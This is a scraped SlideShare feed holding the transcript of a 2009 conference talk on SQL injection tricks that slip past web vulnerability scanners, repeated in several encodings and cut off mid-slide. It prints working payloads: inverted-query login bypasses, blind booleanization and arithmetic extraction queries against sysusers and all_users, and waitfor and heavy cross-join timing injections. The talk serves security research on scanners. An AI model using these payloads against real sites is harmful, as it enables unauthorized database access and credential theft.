47.“ Where-Clause” execution order 
Select “whatever “ 
From whatever 
Where condition1 and condition2 
- Condition1 lasts 10 seconds 
- Condition2 lasts 100 seconds 
Which condition should be executed first? 
48.The heavy condition first Condition2 (100 sec) Condition1 (10 sec) Condition2 &amp; condition1 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 100 sec 
49.The light condition first Condition1 (10 sec) Condition2 (100 sec) Condition1 &amp; condition2 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 10 sec 
50.Time-Based Blind SQL Injection using Heavy Queries 
Attacker can perform an exploitation delaying the “True-answer page” using a heavy query. 
It depends on how the database engine evaluates the where clauses in the query. 
There are two types of database engines: 
Databases without optimization process 
Databases with optimization process 
51.Time-Based Blind SQL Injection using Heavy Queries 
Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections. 
The Cross-join injection must be heavier than the other condition. 
Attacker only have to know or to guess the name of a table with select permission in the database. 
Example in MSSQL: 
Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)&gt;1 and 300&gt;(select top 1 ascii(substring(name,1,1)) from sysusers) 
52.“ Default” tables to construct a heavy query 
Microsoft SQL Server 
sysusers 
Oracle 
all_users 
MySQL (versión 5) 
information_schema.columns 
Microsoft Access 
MSysAccessObjects (97 &amp; 2000 versions) 
MSysAccessStorage (2003 &amp; 2007) 
53.“ Default” tables to construct a heavy query 
… or whatever you can guess 
Clients 
Customers 
News 
Logins 
Users 
Providers 
… .Use your imagination… 
54.Ex 1: MS SQL Server 
Query takes 14 seconds -&gt; True-Answer 
55.Ex 1: MS SQL Server 
Query takes 1 second -&gt; False-Answer 
56.Ex 2: Oracle 
Query Takes 22 seconds –&gt; True-Answer 
57.Ex 2: Oracle 
Query Takes 1 second –&gt; False-Answer 
58.Ex 3: Access 2007 
Query Takes 39 seconds –&gt; True-Answer 
59.Ex 3: Access 2007 
Query Takes 1 second –&gt; False-Answer 
60.Marathon Tool 
Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases. 
Schema Extraction from known databases 
Extract data using heavy queries not matter in which database engine (without schema) 
Developed in .NET 
Source code available 
http://www.codeplex.com/marathontool 
61.Demo: Marathon Tool 
62.5.- Conclusions 
63.The real world has plenty kinds of developers… 
64.References 
Inverted SQL queries (Spanish) 
http://elladodelmal.blogspot.com/2009/09/inverted-sql-queries-ii-de-ii.html 
Arithemtic Blind SQL Injection (spanish) 
http://elladodelmal.blogspot.com/2009/07/arithmetic-blind-sql-injection-i-de-ii.html 
Time-Based Blind SQL Injection Using heavy queries &amp; Marathon Tool 
http://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf 
Marathon Tool 
http://www.codeplex.com/marathontool 
Connection String Attacks (spanish) 
http://www.slideshare.net/chemai64/connection-string-parameter-pollution 
65.Don´t complain about your job!! 
66.Thanks! Chema Alonso ( [email_address] ) José Parada ( [email_address] ) 
+ chemai64, 20 hours ago 

Embed  custom .Without related presentations 
 
For WordPress.com 
 

173 views, 0 favs, 3 embeds more stats 

Session deliverd by José Parada &amp; Chema Alonso in more

Session deliverd by José Parada &amp; Chema Alonso in CONFidence VI Edition - Warszawa 2009 about How How &quot;·$% developers defeat the web vulnerability scanners. SQL injection Tips &amp; Tricks. That´s all folks!]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/confidence2009public-091120104250-phpapp01-thumbnail-2?1258735439" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Share Favorite 
Favorited X 
Download More... 
Favorited! Want to add tags? Have an opinion? Make a quick comment as well.  Cancel  
Edit your favorites  Cancel  
Send to your Group / Event Select Group / Event   
Add your message  Cancel   
Post toBlogger WordPress Twitter Facebook Deliciousmore share options .Embed  For WordPress.com 
 
Without related presentations 
 
0 commentsPost a comment 

Post a comment
 .. 
Embed Video  Subscribe to follow-up comments Unsubscribe from followup comments .  
Edit your comment  Cancel  .Notes on slide 1
no notes for slide #1

no notes for slide #1
..Favorites, Groups &amp; Events
more
How &quot;·$% developers defeat the web vulnerability scanners - Presentation Transcript
1.How ?¿$·&amp; developers defeat the most famous web vulnerability scanners …or how to recognize old friends Chema Alonso Informática64 José Parada Microsoft Ibérica 
2.Agenda 
1.- Introduction 
2.- Inverted Queries 
3.- Arithmetic Blind SQL Injection 
4.- Time-Based Blind SQL Injection using Heavey Queries 
5.- Conclusions 
3.1.-Introduction 
4.SQL Injection is still here among us 
5.Web Application Security Consortium: Comparision http://projects.webappsec.org/Web-Application-Security-Statistics 12.186 sites 97.554 bugs 
6.Need to Improve Automatic Scanning 
Not always a manual scanning is possible 
Time 
Confidentiality 
Money, money, money… 
Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools. 
7.2.-Inverted Queries 
8. 
9.Homers, how are they? 
Lazy 
Bad trainined 
Poor Experience in security stuff 
Don´t like working 
Don´t like computing 
Don´t like coding 
Don´t like you! 
10.Flanders are Left-handed 
11.Right 
SELECT UID 
FROM USERS 
WHERE NAME=‘V_NAME’ 
AND 
PASSWORD=‘V_PASSW’; 
12.Wrong? 
SELECT UID 
FROM USERS 
WHERE ‘V_NAME’=NAME AND 
‘ V_PASSW’=PASSWORD 
13.Login Inverted Query 
Select uid 
From users where ‘v_name’=name and ‘v_pass’=password 
http://www.web.com/login.php?v_name=Robert&amp;v_pass=Kubica’ or &amp;apos;1&amp;apos;=&amp;apos;1 
Select uid 
From users where ‘Robert’=name and ‘Kubica’ or ‘1’=‘1’=password 
 FAIL 
14.Login Inverted SQL Injection an example 
Select uid 
From users where ‘v_name’=name and ‘v_pass’=password 
http://www.web.com/login.php?v_name=Robert&amp;v_pass=’=‘’ or ‘1’=‘1’ or ‘Kubica 
Select uid 
From users where ‘Robert’=name and ’’=‘’ or ‘1’=‘1’ or ‘Kubica’=password 
 Success 
15.Blind Attacks 
Attacker injects code but can´t access directly to the data. 
However this injection changes the behavior of the web application. 
Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. 
Blind SQL Injection 
Biind Xpath Injection 
Blind LDAP Injection 
16.Blind SQL Injection Attacks 
Attacker injects: 
“ True where clauses” 
“ False where clauses“ 
Ex: 
Program.php?id=1 and 1=1 
Program.php?id=1 and 1=2 
Program doesn’t return any visible data from database or data in error messages. 
The attacker can´t see any data extracted from the database. 
17.Blind SQL Injection Attacks 
Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”: 
Different hashes 
Different html structure 
Different patterns (keywords) 
Different linear ASCII sums 
“ Different behavior” 
By example: Response Time 
18.Blind SQL Injection Attacks 
If any difference exists, then: 
Attacker can extract all information from database 
How? Using “booleanization” 
MySQL: 
Program.php?id=1 and 100&gt;(ASCII(Substring(user(),1,1))) 
“ True-Answer Page” or “False-Answer Page”? 
MSSQL: 
Program.php?id=1 and 100&gt;(Select top 1 ASCII(Substring(name,1,1))) from sysusers) 
Oracle: 
Program.php?id=1 and 100&gt;(Select ASCII(Substr(username,1,1))) from all_users where rownum&amp;lt;=1) 
19.Blind Inverted Query 
Select product 
From products 
Where v_value=id; 
http://www.web.com/products.php?v_value= 2 and 1=1 
Select product 
From products 
Where 2 and 1=1=id; 
-&gt; FAIL 
20.The MySQL Case 
1 is True 
1=1=1 -&gt;True 
1=1=(1+1-1)=abs(1)=1 -&gt; True 
2=2=2 -&gt;False 
-&gt; 2=2 becomes True -&gt; True=2 
-&gt; True is equals to 1 then 1=2 is False 
Select product 
From products 
Where v_value=id; 
http://www.web.com/products.php?v_value= 1 and 1=1 
Select product 
From products 
Where 1 and 1=1=id; 
-&gt; SUCCES (if there is a Id=1) 
21.Web Scanner behaviors 
Acunetix 
Paros 
AppScan 
W3af 
Wapiti 
Proxy Strike 
22.Acunetix &amp; Homer 
23.Acunetix &amp; Flanders 
24.AppScan &amp; Homer 
25.AppScan &amp; Flanders 
26.Paros &amp; Homer 
27.Paros &amp; Flanders 
28.W3af &amp; Homer 
29.W3af &amp; Flanders 
30.Wapiti &amp; Homer 
31.Wapiti &amp; Flanders 
32.Demo 
W3af 
Wapiti 
Proxy Strike 
33.Results   Normal Inverted   MySQL MS SQL Server MySQL MS SQL Server   Numeric String Numeric String Numeric String Numeric String Paros                 AppScan                 Acunetix                 w3af                 wapiti                 Proxy Strike                 
34.In the end… 
OUCH!!! 
Thank God for keep me safe 
35.Solutions? 
Concat string injection 
Arithmetic Blind SQL Injection 
Time-Based Blind SQL injection 
Delay Functions 
Heavy queries 
36.3.- Arithmetic 
37.What about this queries? 
How to detect/exploit this Blind SQLinjection vulnerability? 
The query forces the parameter to be numeric 
SELECT field FROM table WHERE id=abs( param ) 
Ex: 
Get Param( ID ) 
Select ….. Where att1=abs( ID ) 
Select ….. Where att2=k1- ID 
Print response 
Not AND or OR operators can be used. 
Boolean logic needs to be created with math operations 
38.Arithmetic Blind SQL Injection 
Divide by zero (David Litchfield) 
Id=A+(1/(ASCII(B)-C)) 
A-&gt; Param value originally used in the query. 
B -&gt; Value we are searching for, e.g.: Substring(passwd,1,1) 
C-&gt; Counter [0..255] 
TRUE: When ASCII(B)=C, the DB will generate a divide by zero exception. 
39.Arithmetic Blind SQL Injection 
Sums and subtractions 
Id=A+ASCII(B)-C 
A-&gt; Param value originally used in the query. 
B -&gt; Value we are searching for, e.g.: Substring(passwd,1,1) 
C-&gt; Counter [0..255] 
When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A 
40.Arithmetic Blind SQL Injection 
Value type overflow 
Id=A+((C/ASCII(B))*(K)) 
A-&gt; Param value originally used in the query. 
B -&gt; Value we are searching for, e.g.: Substring(passwd,1,1) 
C-&gt; Counter [0..255] 
K-&gt; Value that overflows the type defined for A 
(e.g. if A is integer, then K=2^ 32 ) 
When C/ASCII(B)==1, K*1 overflows the data type 
41.Demo: 
Divide by zero 
Sums and subtractions 
Integer overflow 
42.Conclusions 
Arithmetic Blind SQL Injection allows to construct binary logic without “AND” and “OR”. 
detects bugs in this kind of queries… 
And also in Inverted queries in which a numeric value is used 
Almost none of the vulnerability scanners are using this method 
43.4.-Time-based Blind SQL Injection using heavy queries 
44.Time-Based Blind SQL Injection 
In scenarios with no differences between “True-Answer Page” and “False-Answer Page”, time delays can be used. 
Injection forces a delay in the response page when the condition injected is True. 
- Delay functions: 
SQL Server: waitfor 
Oracle: dbms_lock.sleep 
MySQL: sleep or Benchmark Function 
Postgres: pg_sleep 
Ex: 
; if (exists(select * from users)) waitfor delay &amp;apos;0:0:5’ 
45.Time-Based Blind SQL Injection 
What about DBs without delay functions, i.e.: 
Oracle connections MS Access DB2 
without PL/SQL injection 
Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks? 
46. 
47.“ Where-Clause” execution order 
Select “whatever “ 
From whatever 
Where condition1 and condition2 
- Condition1 lasts 10 seconds 
- Condition2 lasts 100 seconds 
Which condition should be executed first? 
48.The heavy condition first Condition2 (100 sec) Condition1 (10 sec) Condition2 &amp; condition1 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 100 sec 
49.The light condition first Condition1 (10 sec) Condition2 (100 sec) Condition1 &amp; condition2 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 10 sec 
50.Time-Based Blind SQL Injection using Heavy Queries 
Attacker can perform an exploitation delaying the “True-answer page” using a heavy query. 
It depends on how the database engine evaluates the where clauses in the query. 
There are two types of database engines: 
Databases without optimization process 
Databases with optimization process 
51.Time-Based Blind SQL Injection using Heavy Queries 
Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections. 
The Cross-join injection must be heavier than the other condition. 
Attacker only have to know or to guess the name of a table with select permission in the database. 
Example in MSSQL: 
Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)&gt;1 and 300&gt;(select top 1 ascii(substring(name,1,1)) from sysusers) 
52.“ Default” tables to construct a heavy query 
Microsoft SQL Server 
sysusers 
Oracle 
all_users 
MySQL (versión 5) 
information_schema.columns 
Microsoft Access 
MSysAccessObjects (97 &amp; 2000 versions) 
MSysAccessStorage (2003 &amp; 2007) 
53.“ Default” tables to construct a heavy query 
… or whatever you can guess 
Clients 
Customers 
News 
Logins 
Users 
Providers 
… .Use your imagination… 
54.Ex 1: MS SQL Server 
Query takes 14 seconds -&gt; True-Answer 
55.Ex 1: MS SQL Server 
Query takes 1 second -&gt; False-Answer 
56.Ex 2: Oracle 
Query Takes 22 seconds –&gt; True-Answer 
57.Ex 2: Oracle 
Query Takes 1 second –&gt; False-Answer 
58.Ex 3: Access 2007 
Query Takes 39 seconds –&gt; True-Answer 
59.Ex 3: Access 2007 
Query Takes 1 second –&gt; False-Answer 
60.Marathon Tool 
Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases. 
Schema Extraction from known databases 
Extract data using heavy queries not matter in which database engine (without schema) 
Developed in .NET 
Source code available 
http://www.codeplex.com/marathontool 
61.Demo: Marathon Tool 
62.5.- Conclusions 
63.The real world has plenty kinds of developers… 
64.References 
Inverted SQL queries (Spanish) 
http://elladodelmal.blogspot.com/2009/09/inverted-sql-queries-ii-de-ii.html 
Arithemtic Blind SQL Injection (spanish) 
http://elladodelmal.blogspot.com/2009/07/arithmetic-blind-sql-injection-i-de-ii.html 
Time-Based Blind SQL Injection Using heavy queries &amp; Marathon Tool 
http://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf 
Marathon Tool 
http://www.codeplex.com/marathontool 
Connection String Attacks (spanish) 
http://www.slideshare.net/chemai64/connection-string-parameter-pollution 
65.Don´t complain about your job!! 
66.Thanks! Chema Alonso ( [email_address] ) José Parada ( [email_address] ) 
+ chemai64, 20 hours ago 

Embed  custom .Without related presentations 
 
For WordPress.com 
 

173 views, 0 favs, 3 embeds more stats 

Session deliverd by José Parada &amp; Chema Alonso in more

Session deliverd by José Parada &amp; Chema Alonso in CONFidence VI Edition - Warszawa 2009 about How How &quot;·$% developers defeat the web vulnerability scanners. SQL injection Tips &amp; Tricks. That´s all folks!]]>
      </content:encoded>
      <pubDate>Fri, 20 Nov 2009 16:42:42 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/how-developers-defeat-the-web-vulnerability-scanners-2546881</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/how-developers-defeat-the-web-vulnerability-scanners-2546881"/>
        <media:title>How &amp;quot;&#183;$% developers defeat the web vulnerability scanners</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Share Favorite 
Favorited X 
Download More... 
Favorited! Want to add tags? Have an opinion? Make a quick comment as well.  Cancel  
Edit your favorites  Cancel  
Send to your Group / Event Select Group / Event   
Add your message  Cancel   
Post toBlogger WordPress Twitter Facebook Deliciousmore share options .Embed  For WordPress.com 
 
Without related presentations 
 
0 commentsPost a comment 

Post a comment
 .. 
Embed Video  Subscribe to follow-up comments Unsubscribe from followup comments .  
Edit your comment  Cancel  .Notes on slide 1
no notes for slide #1

no notes for slide #1
..Favorites, Groups &amp;amp; Events
more
How &amp;quot;&#183;$% developers defeat the web vulnerability scanners - Presentation Transcript
1.How ?&#191;$&#183;&amp;amp; developers defeat the most famous web vulnerability scanners &#8230;or how to recognize old friends Chema Alonso Inform&#225;tica64 Jos&#233; Parada Microsoft Ib&#233;rica 
2.Agenda 
1.- Introduction 
2.- Inverted Queries 
3.- Arithmetic Blind SQL Injection 
4.- Time-Based Blind SQL Injection using Heavey Queries 
5.- Conclusions 
3.1.-Introduction 
4.SQL Injection is still here among us 
5.Web Application Security Consortium: Comparision http://projects.webappsec.org/Web-Application-Security-Statistics 12.186 sites 97.554 bugs 
6.Need to Improve Automatic Scanning 
Not always a manual scanning is possible 
Time 
Confidentiality 
Money, money, money&#8230; 
Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools. 
7.2.-Inverted Queries 
8. 
9.Homers, how are they? 
Lazy 
Bad trainined 
Poor Experience in security stuff 
Don&#180;t like working 
Don&#180;t like computing 
Don&#180;t like coding 
Don&#180;t like you! 
10.Flanders are Left-handed 
11.Right 
SELECT UID 
FROM USERS 
WHERE NAME=&#8216;V_NAME&#8217; 
AND 
PASSWORD=&#8216;V_PASSW&#8217;; 
12.Wrong? 
SELECT UID 
FROM USERS 
WHERE &#8216;V_NAME&#8217;=NAME AND 
&#8216; V_PASSW&#8217;=PASSWORD 
13.Login Inverted Query 
Select uid 
From users where &#8216;v_name&#8217;=name and &#8216;v_pass&#8217;=password 
http://www.web.com/login.php?v_name=Robert&amp;amp;v_pass=Kubica&#8217; or &amp;amp;apos;1&amp;amp;apos;=&amp;amp;apos;1 
Select uid 
From users where &#8216;Robert&#8217;=name and &#8216;Kubica&#8217; or &#8216;1&#8217;=&#8216;1&#8217;=password 
&#61664; FAIL 
14.Login Inverted SQL Injection an example 
Select uid 
From users where &#8216;v_name&#8217;=name and &#8216;v_pass&#8217;=password 
http://www.web.com/login.php?v_name=Robert&amp;amp;v_pass=&#8217;=&#8216;&#8217; or &#8216;1&#8217;=&#8216;1&#8217; or &#8216;Kubica 
Select uid 
From users where &#8216;Robert&#8217;=name and &#8217;&#8217;=&#8216;&#8217; or &#8216;1&#8217;=&#8216;1&#8217; or &#8216;Kubica&#8217;=password 
&#61664; Success 
15.Blind Attacks 
Attacker injects code but can&#180;t access directly to the data. 
However this injection changes the behavior of the web application. 
Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. 
Blind SQL Injection 
Biind Xpath Injection 
Blind LDAP Injection 
16.Blind SQL Injection Attacks 
Attacker injects: 
&#8220; True where clauses&#8221; 
&#8220; False where clauses&#8220; 
Ex: 
Program.php?id=1 and 1=1 
Program.php?id=1 and 1=2 
Program doesn&#8217;t return any visible data from database or data in error messages. 
The attacker can&#180;t see any data extracted from the database. 
17.Blind SQL Injection Attacks 
Attacker analyzes the response pages looking for differences between &#8220;True-Answer Page&#8221; and &#8220;False-Answer Page&#8221;: 
Different hashes 
Different html structure 
Different patterns (keywords) 
Different linear ASCII sums 
&#8220; Different behavior&#8221; 
By example: Response Time 
18.Blind SQL Injection Attacks 
If any difference exists, then: 
Attacker can extract all information from database 
How? Using &#8220;booleanization&#8221; 
MySQL: 
Program.php?id=1 and 100&amp;gt;(ASCII(Substring(user(),1,1))) 
&#8220; True-Answer Page&#8221; or &#8220;False-Answer Page&#8221;? 
MSSQL: 
Program.php?id=1 and 100&amp;gt;(Select top 1 ASCII(Substring(name,1,1))) from sysusers) 
Oracle: 
Program.php?id=1 and 100&amp;gt;(Select ASCII(Substr(username,1,1))) from all_users where rownum&amp;amp;lt;=1) 
19.Blind Inverted Query 
Select product 
From products 
Where v_value=id; 
http://www.web.com/products.php?v_value= 2 and 1=1 
Select product 
From products 
Where 2 and 1=1=id; 
-&amp;gt; FAIL 
20.The MySQL Case 
1 is True 
1=1=1 -&amp;gt;True 
1=1=(1+1-1)=abs(1)=1 -&amp;gt; True 
2=2=2 -&amp;gt;False 
-&amp;gt; 2=2 becomes True -&amp;gt; True=2 
-&amp;gt; True is equals to 1 then 1=2 is False 
Select product 
From products 
Where v_value=id; 
http://www.web.com/products.php?v_value= 1 and 1=1 
Select product 
From products 
Where 1 and 1=1=id; 
-&amp;gt; SUCCES (if there is a Id=1) 
21.Web Scanner behaviors 
Acunetix 
Paros 
AppScan 
W3af 
Wapiti 
Proxy Strike 
22.Acunetix &amp;amp; Homer 
23.Acunetix &amp;amp; Flanders 
24.AppScan &amp;amp; Homer 
25.AppScan &amp;amp; Flanders 
26.Paros &amp;amp; Homer 
27.Paros &amp;amp; Flanders 
28.W3af &amp;amp; Homer 
29.W3af &amp;amp; Flanders 
30.Wapiti &amp;amp; Homer 
31.Wapiti &amp;amp; Flanders 
32.Demo 
W3af 
Wapiti 
Proxy Strike 
33.Results   Normal Inverted   MySQL MS SQL Server MySQL MS SQL Server   Numeric String Numeric String Numeric String Numeric String Paros                 AppScan                 Acunetix                 w3af                 wapiti                 Proxy Strike                 
34.In the end&#8230; 
OUCH!!! 
Thank God for keep me safe 
35.Solutions? 
Concat string injection 
Arithmetic Blind SQL Injection 
Time-Based Blind SQL injection 
Delay Functions 
Heavy queries 
36.3.- Arithmetic 
37.What about this queries? 
How to detect/exploit this Blind SQLinjection vulnerability? 
The query forces the parameter to be numeric 
SELECT field FROM table WHERE id=abs( param ) 
Ex: 
Get Param( ID ) 
Select &#8230;.. Where att1=abs( ID ) 
Select &#8230;.. Where att2=k1- ID 
Print response 
Not AND or OR operators can be used. 
Boolean logic needs to be created with math operations 
38.Arithmetic Blind SQL Injection 
Divide by zero (David Litchfield) 
Id=A+(1/(ASCII(B)-C)) 
A-&amp;gt; Param value originally used in the query. 
B -&amp;gt; Value we are searching for, e.g.: Substring(passwd,1,1) 
C-&amp;gt; Counter [0..255] 
TRUE: When ASCII(B)=C, the DB will generate a divide by zero exception. 
39.Arithmetic Blind SQL Injection 
Sums and subtractions 
Id=A+ASCII(B)-C 
A-&amp;gt; Param value originally used in the query. 
B -&amp;gt; Value we are searching for, e.g.: Substring(passwd,1,1) 
C-&amp;gt; Counter [0..255] 
When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A 
40.Arithmetic Blind SQL Injection 
Value type overflow 
Id=A+((C/ASCII(B))*(K)) 
A-&amp;gt; Param value originally used in the query. 
B -&amp;gt; Value we are searching for, e.g.: Substring(passwd,1,1) 
C-&amp;gt; Counter [0..255] 
K-&amp;gt; Value that overflows the type defined for A 
(e.g. if A is integer, then K=2^ 32 ) 
When C/ASCII(B)==1, K*1 overflows the data type 
41.Demo: 
Divide by zero 
Sums and subtractions 
Integer overflow 
42.Conclusions 
Arithmetic Blind SQL Injection allows to construct binary logic without &#8220;AND&#8221; and &#8220;OR&#8221;. 
detects bugs in this kind of queries&#8230; 
And also in Inverted queries in which a numeric value is used 
Almost none of the vulnerability scanners are using this method 
43.4.-Time-based Blind SQL Injection using heavy queries 
44.Time-Based Blind SQL Injection 
In scenarios with no differences between &#8220;True-Answer Page&#8221; and &#8220;False-Answer Page&#8221;, time delays can be used. 
Injection forces a delay in the response page when the condition injected is True. 
- Delay functions: 
SQL Server: waitfor 
Oracle: dbms_lock.sleep 
MySQL: sleep or Benchmark Function 
Postgres: pg_sleep 
Ex: 
; if (exists(select * from users)) waitfor delay &amp;amp;apos;0:0:5&#8217; 
45.Time-Based Blind SQL Injection 
What about DBs without delay functions, i.e.: 
Oracle connections MS Access DB2 
without PL/SQL injection 
Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks? 
46. 
47.&#8220; Where-Clause&#8221; execution order 
Select &#8220;whatever &#8220; 
From whatever 
Where condition1 and condition2 
- Condition1 lasts 10 seconds 
- Condition2 lasts 100 seconds 
Which condition should be executed first? 
48.The heavy condition first Condition2 (100 sec) Condition1 (10 sec) Condition2 &amp;amp; condition1 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 100 sec 
49.The light condition first Condition1 (10 sec) Condition2 (100 sec) Condition1 &amp;amp; condition2 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 10 sec 
50.Time-Based Blind SQL Injection using Heavy Queries 
Attacker can perform an exploitation delaying the &#8220;True-answer page&#8221; using a heavy query. 
It depends on how the database engine evaluates the where clauses in the query. 
There are two types of database engines: 
Databases without optimization process 
Databases with optimization process 
51.Time-Based Blind SQL Injection using Heavy Queries 
Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections. 
The Cross-join injection must be heavier than the other condition. 
Attacker only have to know or to guess the name of a table with select permission in the database. 
Example in MSSQL: 
Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)&amp;gt;1 and 300&amp;gt;(select top 1 ascii(substring(name,1,1)) from sysusers) 
52.&#8220; Default&#8221; tables to construct a heavy query 
Microsoft SQL Server 
sysusers 
Oracle 
all_users 
MySQL (versi&#243;n 5) 
information_schema.columns 
Microsoft Access 
MSysAccessObjects (97 &amp;amp; 2000 versions) 
MSysAccessStorage (2003 &amp;amp; 2007) 
53.&#8220; Default&#8221; tables to construct a heavy query 
&#8230; or whatever you can guess 
Clients 
Customers 
News 
Logins 
Users 
Providers 
&#8230; .Use your imagination&#8230; 
54.Ex 1: MS SQL Server 
Query takes 14 seconds -&amp;gt; True-Answer 
55.Ex 1: MS SQL Server 
Query takes 1 second -&amp;gt; False-Answer 
56.Ex 2: Oracle 
Query Takes 22 seconds &#8211;&amp;gt; True-Answer 
57.Ex 2: Oracle 
Query Takes 1 second &#8211;&amp;gt; False-Answer 
58.Ex 3: Access 2007 
Query Takes 39 seconds &#8211;&amp;gt; True-Answer 
59.Ex 3: Access 2007 
Query Takes 1 second &#8211;&amp;gt; False-Answer 
60.Marathon Tool 
Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases. 
Schema Extraction from known databases 
Extract data using heavy queries not matter in which database engine (without schema) 
Developed in .NET 
Source code available 
http://www.codeplex.com/marathontool 
61.Demo: Marathon Tool 
62.5.- Conclusions 
63.The real world has plenty kinds of developers&#8230; 
64.References 
Inverted SQL queries (Spanish) 
http://elladodelmal.blogspot.com/2009/09/inverted-sql-queries-ii-de-ii.html 
Arithemtic Blind SQL Injection (spanish) 
http://elladodelmal.blogspot.com/2009/07/arithmetic-blind-sql-injection-i-de-ii.html 
Time-Based Blind SQL Injection Using heavy queries &amp;amp; Marathon Tool 
http://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf 
Marathon Tool 
http://www.codeplex.com/marathontool 
Connection String Attacks (spanish) 
http://www.slideshare.net/chemai64/connection-string-parameter-pollution 
65.Don&#180;t complain about your job!! 
66.Thanks! Chema Alonso ( [email_address] ) Jos&#233; Parada ( [email_address] ) 
+ chemai64, 20 hours ago 

Embed  custom .Without related presentations 
 
For WordPress.com 
 

173 views, 0 favs, 3 embeds more stats 

Session deliverd by Jos&#233; Parada &amp;amp; Chema Alonso in more

Session deliverd by Jos&#233; Parada &amp;amp; Chema Alonso in CONFidence VI Edition - Warszawa 2009 about How How &amp;quot;&#183;$% developers defeat the web vulnerability scanners. SQL injection Tips &amp;amp; Tricks. That&#180;s all folks!</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/confidence2009public-091120104250-phpapp01-thumbnail-2?1258735439&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Share Favorite 
Favorited X 
Download More... 
Favorited! Want to add tags? Have an opinion? Make a quick comment as well.  Cancel  
Edit your favorites  Cancel  
Send to your Group / Event Select Group / Event   
Add your message  Cancel   
Post toBlogger WordPress Twitter Facebook Deliciousmore share options .Embed  For WordPress.com 
 
Without related presentations 
 
0 commentsPost a comment 

Post a comment
 .. 
Embed Video  Subscribe to follow-up comments Unsubscribe from followup comments .  
Edit your comment  Cancel  .Notes on slide 1
no notes for slide #1

no notes for slide #1
..Favorites, Groups &amp;amp; Events
more
How &amp;quot;&#183;$% developers defeat the web vulnerability scanners - Presentation Transcript
1.How ?&#191;$&#183;&amp;amp; developers defeat the most famous web vulnerability scanners &#8230;or how to recognize old friends Chema Alonso Inform&#225;tica64 Jos&#233; Parada Microsoft Ib&#233;rica 
2.Agenda 
1.- Introduction 
2.- Inverted Queries 
3.- Arithmetic Blind SQL Injection 
4.- Time-Based Blind SQL Injection using Heavey Queries 
5.- Conclusions 
3.1.-Introduction 
4.SQL Injection is still here among us 
5.Web Application Security Consortium: Comparision http://projects.webappsec.org/Web-Application-Security-Statistics 12.186 sites 97.554 bugs 
6.Need to Improve Automatic Scanning 
Not always a manual scanning is possible 
Time 
Confidentiality 
Money, money, money&#8230; 
Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools. 
7.2.-Inverted Queries 
8. 
9.Homers, how are they? 
Lazy 
Bad trainined 
Poor Experience in security stuff 
Don&#180;t like working 
Don&#180;t like computing 
Don&#180;t like coding 
Don&#180;t like you! 
10.Flanders are Left-handed 
11.Right 
SELECT UID 
FROM USERS 
WHERE NAME=&#8216;V_NAME&#8217; 
AND 
PASSWORD=&#8216;V_PASSW&#8217;; 
12.Wrong? 
SELECT UID 
FROM USERS 
WHERE &#8216;V_NAME&#8217;=NAME AND 
&#8216; V_PASSW&#8217;=PASSWORD 
13.Login Inverted Query 
Select uid 
From users where &#8216;v_name&#8217;=name and &#8216;v_pass&#8217;=password 
http://www.web.com/login.php?v_name=Robert&amp;amp;v_pass=Kubica&#8217; or &amp;amp;apos;1&amp;amp;apos;=&amp;amp;apos;1 
Select uid 
From users where &#8216;Robert&#8217;=name and &#8216;Kubica&#8217; or &#8216;1&#8217;=&#8216;1&#8217;=password 
&#61664; FAIL 
14.Login Inverted SQL Injection an example 
Select uid 
From users where &#8216;v_name&#8217;=name and &#8216;v_pass&#8217;=password 
